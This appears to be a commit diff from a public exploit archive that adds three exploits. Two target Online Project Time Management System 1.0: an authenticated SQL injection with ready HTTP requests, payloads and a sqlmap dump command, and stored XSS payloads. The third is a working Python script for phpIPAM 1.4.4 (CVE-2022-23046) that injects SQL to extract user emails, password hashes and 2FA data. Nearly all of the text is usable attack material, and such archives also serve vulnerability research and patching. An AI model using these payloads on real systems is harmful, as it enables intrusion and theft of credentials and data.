DB: 2022-01-26

3 changes to exploits/shellcodes

Online Project Time Management System 1.0 - SQLi (Authenticated)
Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)
PHPIPAM 1.4.4 - SQLi (Authenticated)

exploits/php/webapps/50682.txt

@@ -0,0 +1,106 @@
+# Exploit Title: Online Project Time Management System 1.0 - SQLi (Authenticated)
+# Date: 19/01/2022
+# Exploit Author: Felipe Alcantara (Filiplain)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Kali Linux
+
+# Steps to reproduce
+# Log in as an employee
+# Go to : http://localhost/ptms/?page=user
+# Click Update
+# Save request in BurpSuite
+# Run saved request with sqlmap: sqlmap -r request.txt --batch --risk 3 --level 3 --dump
+
+==========================
+POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
+Host: localhost
+Content-Length: 1362
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary39q8yel1pdwYRLNz
+Origin: http://localhost
+Referer: http://localhost/ptms/?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="id"
+
+4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="code"
+
+2022-0003
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="generated_password"
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="firstname"
+
+Mark 2223
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="middlename"
+
+Z
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="lastname"
+
+Cooper
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="gender"
+
+Male
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="department"
+
+IT Department
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="position"
+
+Department Manager
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="email"
+
+mcooper@sample.com
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="password"
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundary39q8yel1pdwYRLNz--
+
+
+
+
+==========================
+
+#Payloads
+#++++++++++++
+#Payload: (Boolean-Based Blind)
+
+#------WebKitFormBoundary39q8yel1pdwYRLNz
+#Content-Disposition: form-data; name="id"
+
+#4' or 1=1 --
+
+#--------
+
+#Payload: (time-based blind)
+
+#------WebKitFormBoundary39q8yel1pdwYRLNz
+#Content-Disposition: form-data; name="id"
+
+#4' AND (SELECT 1 FROM (SELECT(SLEEP(4)))test)-- test
+
+#-------

exploits/php/webapps/50683.txt

@@ -0,0 +1,129 @@
+# Exploit Title: Online Project Time Management System 1.0 - Multiple Stored XSS (Authenticated)
+# Date: 19/01/2022
+# Exploit Author: Felipe Alcantara (Filiplain)
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/15136/online-project-time-management-system-phpoop-free-source-code.html
+# Version: 1.0
+# Tested on: Kali Linux
+# Description: Stored XSS in multiple fields...
+
+# Steps to reproduce (with employee Access)
+
+# Log in as an employee
+# Go to : http://localhost/ptms/?page=user
+# Add XSS payload to any field of the user's name.
+#Click Update
+
+
+=================
+POST /ptms/classes/Users.php?f=save_employee HTTP/1.1
+Host: localhost
+Content-Length: 1339
+Accept: application/json, text/javascript, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvsLkAfaBC64Uzoak
+Origin: http://localhost
+Referer: http://localhost/ptms/?page=user
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="id"
+
+4
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="code"
+
+2022-0003
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="generated_password"
+
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="firstname"
+
+Mark
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="middlename"
+
+<script>alert("XSS_TEST")</script>
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="lastname"
+
+Cooper
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="gender"
+
+Male
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="department"
+
+IT Department
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="position"
+
+Department Manager
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="email"
+
+mcooper@sample.com
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="password"
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+------WebKitFormBoundaryvsLkAfaBC64Uzoak--
+=================
+
+-----------------------------------------------------------------------------
+
+# Steps to reproduce (with Admin access)
+
+# Log in to the admin panel
+# Go to : http://localhost/ptms/admin/?page=system_info
+# Add XSS payload to the 'System Name' field
+#Click Update
+
+
+=================
+
+POST /ptms/classes/SystemSettings.php?f=update_settings HTTP/1.1
+Host: localhost
+Content-Length: 603
+Accept: */*
+X-Requested-With: XMLHttpRequest
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryCibB6pEzThjb4Zcq
+Origin: http://localhost
+Referer: http://localhost/ptms/admin/?page=system_info
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: PHPSESSID=r9ds0ep1v3q2lom422v9e2vcfm
+Connection: close
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="name"
+
+Online Project Time Management System - PHP <script>alert("XSS")</script>
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="short_name"
+
+PTMS - PHP
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="img"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq
+Content-Disposition: form-data; name="cover"; filename=""
+Content-Type: application/octet-stream
+
+
+------WebKitFormBoundaryCibB6pEzThjb4Zcq--
+
+=================

exploits/php/webapps/50684.py

@@ -0,0 +1,84 @@
+# Exploit Title: PHPIPAM 1.4.4 - SQLi (Authenticated)
+# Google Dork: [if applicable]
+# Date: 20/01/2022
+# Exploit Author: Rodolfo "Inc0gbyt3" Tavares
+# Vendor Homepage: https://github.com/phpipam/phpipam
+# Software Link: https://github.com/phpipam/phpipam
+# Version: 1.4.4
+# Tested on: Linux/Windows
+# CVE : CVE-2022-23046
+
+import requests
+import sys
+import argparse
+
+################
+"""
+Author of exploit: Rodolfo 'Inc0gbyt3' Tavares
+CVE: CVE-2022-23046
+Type: SQL Injection
+
+Usage:
+
+$ python3 -m pip install requests
+$ python3 exploit.py -u http://localhost:8082 -U <admin> -P <password>
+"""
+###############
+
+__author__ = "Inc0gbyt3"
+
+menu = argparse.ArgumentParser(description="[+] Exploit for PHPIPAM Version: 1.4.4 Authenticated SQL Injection\n CVE-2022-23046")
+menu.add_argument("-u", "--url", help="[+] URL of target, example: https://phpipam.target.com", type=str)
+menu.add_argument("-U", "--user", help="[+] Username", type=str)
+menu.add_argument("-P", "--password", help="[+] Password", type=str)
+args = menu.parse_args()
+
+if len(sys.argv) < 3:
+    menu.print_help()
+
+target = args.url
+user = args.user
+password = args.password
+
+
+def get_token():
+    u = f"{target}/app/login/login_check.php"
+
+    try:
+        r = requests.post(u, verify=False, timeout=10, headers={"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"}, data={"ipamusername":user, "ipampassword":password})
+        headers = r.headers['Set-Cookie']
+        headers_string = headers.split(';')
+        for s in headers_string:
+            if "phpipam" in s and "," in s: # double same cookie Check LoL
+                cookie = s.strip(',').lstrip()
+                return cookie
+    except Exception as e:
+        print(f"[+] {e}")
+
+
+def exploit_sqli():
+    cookie = get_token()
+    xpl = f"{target}/app/admin/routing/edit-bgp-mapping-search.php"
+    data = {
+        "subnet":'pwn"union select(select concat(@:=0x3a,(select+count(*) from(users)where(@:=concat(@,email,0x3a,password,"0x3a",2fa))),@)),2,3,user() -- -', # dios query dump all :)
+        "bgp_id":1
+    }
+
+    headers = {
+        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
+        "Cookie": cookie
+    }
+
+    try:
+        r = requests.post(xpl, verify=False, timeout=10, headers=headers, data=data)
+        if "admin" in r.text or "rounds" in r.text:
+            print("[+] Vulnerable..\n\n")
+            print(f"> Users and hash passwords: \n\n{r.text}")
+            print("\n\n> DONE <")
+    except Exception as e:
+        print(f"[-] {e}")
+
+
+
+if __name__ == '__main__':
+    exploit_sqli()

files_exploits.csv

@@ -44759,3 +44759,6 @@ id,file,description,date,author,type,platform,port
 50677,exploits/php/webapps/50677.txt,"Rocket LMS 1.1 - Persistent Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50678,exploits/php/webapps/50678.txt,"Affiliate Pro 1.7 - 'Multiple' Cross Site Scripting (XSS)",1970-01-01,Vulnerability-Lab,webapps,php,
 50681,exploits/php/webapps/50681.txt,"Landa Driving School Management System 2.0.1 - Arbitrary File Upload",1970-01-01,"Sohel Yousef",webapps,php,
+50682,exploits/php/webapps/50682.txt,"Online Project Time Management System 1.0 - SQLi (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
+50683,exploits/php/webapps/50683.txt,"Online Project Time Management System 1.0 - Multiple Stored Cross Site Scripting (XSS) (Authenticated)",1970-01-01,"Felipe Alcantara",webapps,php,
+50684,exploits/php/webapps/50684.py,"PHPIPAM 1.4.4 - SQLi (Authenticated)",1970-01-01,"Rodolfo Tavares",webapps,php,